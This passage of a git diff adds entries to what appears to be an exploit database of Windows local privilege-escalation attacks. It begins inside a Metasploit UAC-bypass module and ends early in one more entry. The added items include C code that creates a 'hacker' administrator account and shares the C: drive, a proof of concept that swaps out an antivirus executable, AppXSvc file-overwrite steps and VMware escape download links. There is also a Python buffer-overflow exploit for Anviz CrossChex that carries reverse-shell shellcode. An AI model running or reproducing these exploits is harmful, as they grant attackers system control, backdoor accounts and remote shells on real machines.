+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes'         =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
+      'References'    =>
+        [
+          ['URL', 'https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/'],
+          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1'],
+          ['URL', 'https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass']
+        ],
+      'DisclosureDate' => 'Mar 17 2017'
+      )
+    )
+    register_options(
+      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
+    )
+
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def write_reg_values(registry_key, payload_pathname)
+    begin
+      registry_createkey(registry_key) unless registry_key_exist?(registry_key)
+      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(registry_key, '', payload_pathname, "REG_SZ")
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
+    remove_registry_key = !registry_key_exist?(registry_key)
+
+    # get directory locations straight
+    win_dir = session.sys.config.getenv('windir')
+    vprint_status("win_dir = " + win_dir)
+    tmp_dir = session.sys.config.getenv('tmp')
+    vprint_status("tmp_dir = " + tmp_dir)
+    exploit_dir = win_dir + "\\System32\\"
+    vprint_status("exploit_dir = " + exploit_dir)
+    target_filepath = exploit_dir + "sdclt.exe"
+    vprint_status("exploit_file = " + target_filepath)
+
+    # make payload
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) + '.exe'
+    payload_pathname = tmp_dir + '\\' + payload_name
+    vprint_status("payload_pathname = " + payload_pathname)
+    vprint_status("Making Payload")
+    payload = generate_payload_exe
+    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
+    vprint_status("reg_command = " + reg_command)
+    write_reg_values(registry_key, reg_command)
+
+    # Upload payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+
+    vprint_status("Launching " + target_filepath)
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
+    rescue ::Exception => e
+      print_error("Executing command failed:\n#{e}")
+    end
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    # wait for a few seconds before cleaning up
+    print_status("Please wait for session and cleanup....")
+    sleep(20)
+    vprint_status("Removing Registry Changes")
+    if remove_registry_key
+      registry_deletekey(registry_key)
+    else
+      registry_deleteval(registry_key, "DelegateExecute")
+      registry_deleteval(registry_key, '')
+    end
+    print_status("Registry Changes Removed")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    case is_in_admin_group?
+    when true
+      print_good('Part of Administrators group! Continuing...')
+      if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+        fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+      end
+    when false
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+    when nil
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47705.txt b/exploits/windows/local/47705.txt
new file mode 100644
index 000000000..853ac9aab
--- /dev/null
+++ b/exploits/windows/local/47705.txt
@@ -0,0 +1,25 @@
+#Exploit Title: ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-21
+#Vendor Homepage : http://www.photodex.com/
+#Link Software : http://files.photodex.com/release/pspro_90_3797.exe
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ScsiAccess
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ScsiAccess
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ScsiAccess
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47706.txt b/exploits/windows/local/47706.txt
new file mode 100644
index 000000000..da1bed66f
--- /dev/null
+++ b/exploits/windows/local/47706.txt
@@ -0,0 +1,38 @@
+# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
+# Exploit Author: ZwX
+# Exploit Date: 2019-11-21
+# Vendor Homepage : LiteManager Team
+# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
+# Tested on OS: Windows 7 
+
+
+# Proof of Concept (PoC):
+==========================
+
+
+C:\Program Files\LiteManagerFree - Server>icacls *.exe
+ROMFUSClient.exe Everyone:(F)
+                 AUTORITE NT\Système:(I)(F)
+                 BUILTIN\Administrateurs:(I)(F)
+                 BUILTIN\Utilisateurs:(I)(RX)
+				 
+				 
+#Exploit code(s): 
+=================
+
+1) Compile below 'C' code name it as "ROMFUSClient.exe"
+
+#include<windows.h>
+
+int main(void){
+ system("net user hacker abc123 /add");
+ system("net localgroup Administrators hacker  /add");
+ system("net share SHARE_NAME=c:\ /grant:hacker,full");
+ WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
+return 0;
+} 
+
+2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
+3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
+4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. 
+Privilege Successful Escalation
\ No newline at end of file
diff --git a/exploits/windows/local/47710.txt b/exploits/windows/local/47710.txt
new file mode 100644
index 000000000..ec6542b25
--- /dev/null
+++ b/exploits/windows/local/47710.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-24
+# Vendor Homepage: https://www.dell.com/
+# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
+# Tested Version: 1.1.6.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """
+
+Waves Audio Services	WavesSysSvc	C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe	Auto
+
+# Service info:
+
+C:\>sc qc WavesSysSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WavesSysSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Waves Audio Services
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47712.txt b/exploits/windows/local/47712.txt
new file mode 100644
index 000000000..92283bc71
--- /dev/null
+++ b/exploits/windows/local/47712.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
+# Date: 2019-11-22
+# Exploit Author: Rene Cortes S
+# Vendor Homepage: https://easy-hide-ip.com
+# Software Link: https://easy-hide-ip.com
+# Version: 5.0.0.3
+# Tested on: Windows 7 Professional Service Pack 1
+
+##########################################################################################################################
+
+Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+EasyRedirect		EasyRedirect	C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe	Auto
+
+
+##############################################################################################################################################
+
+Service info:
+
+C:\Users\user>sc qc EasyRedirect
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: EasyRedirect
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
+        GRUPO_ORDEN_CARGA  : 
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : EasyRedirect
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#########################################################################################################################
\ No newline at end of file
diff --git a/exploits/windows/local/47713.txt b/exploits/windows/local/47713.txt
new file mode 100644
index 000000000..58c5fc98b
--- /dev/null
+++ b/exploits/windows/local/47713.txt
@@ -0,0 +1,59 @@
+# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
+# Date: 2019-11-22
+# Exploit Author: Abdelhamid Naceri
+# Vendor Homepage: www.microsoft.com
+# Tested on: Windows 10 1903
+# CVE : CVE-2019-1385
+
+
+Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
+
+Class: Local Elevation of Privileges
+
+Description:
+This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability 
+could allow an attacker to overwrite\create file as SYSTEM which can result in EOP .
+The're is 2 way to abuse the issue .
+Step To Reproduce :
+[1] For An Arbitrary File Creation
+1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To
+your target directory example "c:\"
+2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
+3-Check the directory the file should be created now
+4-Enjoy:)
+[2] To Overwrite File 
+1-Create a temp dir in %temp%\
+2-Create a hardlink to your target file in the temp created dir
+3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to
+your temp created dir
+4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
+5-Check the file again
+Limitation :
+when 'MicrosoftEdge.exe' is created it would inherit the directory permission which
+mean the file wouldnt be writtable in majority of cases but a simple example of 
+abusement in the directory "c:\" <- the default acl is preventing Athenticated Users
+from creating file but not modifying them so if we abused the vulnerability in "c:\"
+we will have an arbitrary file created and also writeable from a normal user .
+also you cant overwrite file that are not writable by SYSTEM , i didnt make a check
+in the poc because in if the file is non readable by the current user the check will
+return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite
+file which you cant even read them .
+In the file creation make sure the path is writtable by SYSTEM otherwise the poc will
+fail . I think 99% of folders are writtable by SYSTEM
+Platform:
+This has been tested on a fully patched system (latest patch -> November 2019) :
+OS Edition:              Microsoft Windows 10 Home
+Os Version:              1903
+OS Version Info:         18362.418
+
+Additional Info
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx  = 18362.1.amd64fre.19h1_release.190318-1202
+
+
+Expected result:
+The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"
+Observed result :
+The Deployment Process is overwritting or creating an arbitrary file as 
+"LOCAL SYSTEM"
+
+NOTE : It was patched on 7/11/19
\ No newline at end of file
diff --git a/exploits/windows/local/47714.md b/exploits/windows/local/47714.md
new file mode 100644
index 000000000..0215f85c9
--- /dev/null
+++ b/exploits/windows/local/47714.md
@@ -0,0 +1,25 @@
+# VMware Escape Exploit
+
+VMware Escape Exploit before VMware WorkStation 12.5.5
+
+Host Target: Win10 x64
+
+Compiler: VS2013 
+
+Test on VMware 12.5.2 build-4638234
+
+# Known issues
+
+* Failing to heap manipulation causes host process crash.
+* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
+
+# FAQ
+
+* Q: Error in reboot vmware after crashing process.
+* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
+
+
+![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif)
+
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47715.md b/exploits/windows/local/47715.md
new file mode 100644
index 000000000..1afee3ba9
--- /dev/null
+++ b/exploits/windows/local/47715.md
@@ -0,0 +1,28 @@
+# VMware Escape Exploit
+
+VMware Escape Exploit before VMware WorkStation 12.5.3
+
+Host Target: Win10 x64
+
+Compiler: VS2013 
+
+Test on VMware 12.5.2 build-4638234
+
+# Known issues
+
+* Failing to heap manipulation causes host process crash. (About 50% successful rate )
+* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
+
+# FAQ
+
+* Q: Error in reboot vmware after crashing process.
+* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
+
+
+![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif)
+
+# Reference
+
+* https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47724.txt b/exploits/windows/local/47724.txt
new file mode 100644
index 000000000..f4c573c46
--- /dev/null
+++ b/exploits/windows/local/47724.txt
@@ -0,0 +1,35 @@
+# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
+# Date: 2019-11-28
+# Exploit Author: Cristian Ayala G
+# Vendor Homepage: https://tenaxsoft.com/index.html
+# Software Link: https://tenaxsoft.com/descargas.html
+# Version: 6.4.131
+# Tested on: Windows 10 Pro x64
+
+##########################################################################
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """
+CCSrvProxy	CCSrvProxy	 C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe	Auto
+Control de impresiones Tenax	ControldeImpresiones	C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe	Auto
+
+##########################################################################
+
+# Service info:
+
+C:\Users\user>sc qc CCSrvProxy
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: CCSrvProxy
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : CCSrvProxy
+        DEPENDENCIAS       : Spooler
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+##########################################################################
\ No newline at end of file
diff --git a/exploits/windows/local/47733.txt b/exploits/windows/local/47733.txt
new file mode 100644
index 000000000..2c4ac32b5
--- /dev/null
+++ b/exploits/windows/local/47733.txt
@@ -0,0 +1,133 @@
+# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.maxpcsecure.com
+# Tested Version: 19.0.4.020
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+www.maxpcsecure.com
+
+
+[Affected Product Code Base]
+Max Secure Anti Virus Plus - 19.0.4.020
+
+File hash: ab1dda23ad3955eb18fdb75f3cbc308a
+msplusx64.exe
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
+Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
+
+C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
+C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
+                                                   BUILTIN\Users:(ID)F
+                                                   NT AUTHORITY\SYSTEM:(ID)F
+                                                   BUILTIN\Administrators:(ID)F
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Exploit/POC]
+#include <stdio.h>
+#include <windows.h>
+#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
+#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
+#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
+
+/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+  DWORD dwAttrib = GetFileAttributes(szPath);
+  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+   
+  if(!FileExists(DISABLED_TARGET)){
+  	CopyFile(TARGET, TMP, FALSE);
+  	Sleep(1000);
+    CopyFile(TMP, DISABLED_TARGET, FALSE);
+    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
+    Sleep(1000);
+    printf("[+] Disabled MaxSDUI.exe ...\n");
+    Sleep(300);
+   }else{
+  	 PWNED=TRUE;
+   }
+   
+    if(!PWNED){
+     	char fname[MAX_PATH];
+        char newLoc[]=TARGET;
+        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+       if (size){
+         printf("[+] Copying exploit to vuln dir...\n");
+         Sleep(1000);
+         CopyFile(fname, TARGET, FALSE);
+         printf("[+] Replaced legit Max Secure EXE...\n");
+         Sleep(2000);
+         printf("[+] Done!\n");
+         MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
+         Sleep(1000);
+         exit(0);
+        }
+    }else{
+    	if(FileExists(TMP)){
+    		 remove(TMP);
+    	}
+     	printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
+     	printf("[+] hyp3rlinx\n");
+     	system("pause");
+     }
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=DXSV5geXkTw
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: November 19, 2019
+Vendor: "received a reply they will fix soon"
+Status request: November 24, 2019
+No replies other than automated response.
+November 29, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47734.py b/exploits/windows/local/47734.py
new file mode 100755
index 000000000..c29323419
--- /dev/null
+++ b/exploits/windows/local/47734.py
@@ -0,0 +1,125 @@
+# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
+# Date: 2019-11-30
+# Exploit Author: Luis Catarino & Pedro Rodrigues
+# Vendor Homepage: https://www.anviz.com/
+# Software Link: https://www.anviz.com/download.html
+# Version: Crosschex Standard x86 <= V4.3.12
+# Tested on: 4.3.8.0, 4.3.12
+# CVE : N/A
+# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
+
+import socket
+import time
+import sys
+import binascii
+
+# Scapy for the broadcast packet with custom sport
+from scapy.all import Raw,IP,Dot1Q,UDP,Ether
+import scapy.all
+
+# shellcode working calc.exe
+calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
+calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
+calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
+calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
+calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
+
+# shellcode windows x86 reverse_shell
+shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
+shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
+shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
+shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
+shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
+
+# shellcode windows x86 reverse_shell (part_2)
+shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
+shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
+shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
+shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
+shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
+shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
+shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
+shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
+shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
+shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+
+def ipToShellcode(ip):
+  a = ip.split('.')
+  b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
+  b = b.replace("0x","")
+  return binascii.unhexlify(b)
+
+# sport has to be 5060
+def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
+    request = b"A"*77 # Original payload substitute
+    request += b"B"*184
+    request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
+    request += b"A"*4
+    # 269 bytes
+
+    if len(sys.argv) > 2:
+      request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
+    else:
+      request = request + calculator_payload
+
+    scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request),  iface=sys.argv[1] )
+
+def setFuzzUDPServer(ip='', port=5050, timeout=150):
+    try :
+    	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    except:
+    	print('[!] Failed to create server socket')
+
+    try:
+    	s.bind(('', port))
+    except:
+    	print('[*] Server socket bind failed')
+    	sys.exit()
+
+    print('[*] Waiting for crosschex')
+    s.settimeout(timeout)
+    timeout = time.time() + timeout
+    responses = []
+
+    while True:
+        if time.time() > timeout:
+            break
+        try:
+            response = s.recvfrom(1024)
+            print(response)
+            responses.append(response)
+            sendFuzzingUDPBroadcast(ip=ip)
+            response = s.recvfrom(1024)            
+        except socket.timeout:
+            print("[!] Error with UDP server")
+
+    s.close()
+    return responses
+
+nargs = len(sys.argv)
+
+if nargs < 2:
+  print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
+  sys.exit(0)
+
+setFuzzUDPServer()
\ No newline at end of file
diff --git a/exploits/windows/local/47746.txt b/exploits/windows/local/47746.txt
new file mode 100644
index 000000000..27dedca39
--- /dev/null
+++ b/exploits/windows/local/47746.txt
@@ -0,0 +1,25 @@
+#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : http://www.netgate.sk/download/download.php?id=5
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc NGDatBckpSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: NGDatBckpSrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NETGATE Data Backup Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47747.txt b/exploits/windows/local/47747.txt
new file mode 100644
index 000000000..2a28e4cb3
--- /dev/null
+++ b/exploits/windows/local/47747.txt
@@ -0,0 +1,39 @@
+#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
+#Exploit Author : ZwX
